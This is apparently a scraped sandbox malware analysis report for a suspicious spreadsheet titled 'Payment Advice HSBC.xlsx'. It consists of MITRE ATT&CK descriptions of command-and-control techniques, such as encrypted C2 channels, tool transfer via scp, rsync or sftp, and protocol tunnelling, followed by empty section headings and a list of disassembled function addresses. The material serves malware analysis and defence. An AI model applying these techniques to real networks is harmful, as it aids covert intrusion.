Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Payment Advice HSBC.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Function 00405634, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112
fileCOMMON

Function 00405080, Relevance: 4.6, APIs: 3, Instructions: 100
fileCOMMON

Function 004056A7, Relevance: 4.6, APIs: 3, Instructions: 74
fileCOMMON

Function 00406D40, Relevance: 4.6, APIs: 3, Instructions: 72
COMMON

Function 00404F6C, Relevance: 3.0, APIs: 2, Instructions: 12
fileCOMMON

Function 00407220, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 184
COMMON

Function 00401788, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Function 004078F6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Function 00402FA4, Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Function 00402F9C, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Function 00402FA0, Relevance: 3.1, APIs: 2, Instructions: 64
COMMON

Function 004075EC, Relevance: 3.1, APIs: 2, Instructions: 63
synchronizationCOMMON

Function 004012A0, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Function 004079F0, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Function 00405200, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Function 0040578C, Relevance: 1.5, APIs: 1, Instructions: 31
registryCOMMON

Function 00406CA8, Relevance: 1.5, APIs: 1, Instructions: 24
windowCOMMON

Function 0040575C, Relevance: 1.5, APIs: 1, Instructions: 22
registryCOMMON

Function 00404F34, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 00404B68, Relevance: 1.5, APIs: 1, Instructions: 18
fileCOMMON

Function 00404BC4, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Function 00404BE0, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Function 00404018, Relevance: 1.5, APIs: 1, Instructions: 14
synchronizationCOMMON

Function 00404EB0, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Function 00404B9C, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Function 00404CF8, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Function 00404BB4, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Function 0040137C, Relevance: 1.3, APIs: 1, Instructions: 62
COMMON

Function 00401434, Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Function 004014C8, Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Function 004010FC, Relevance: 1.3, APIs: 1, Instructions: 34
memoryCOMMON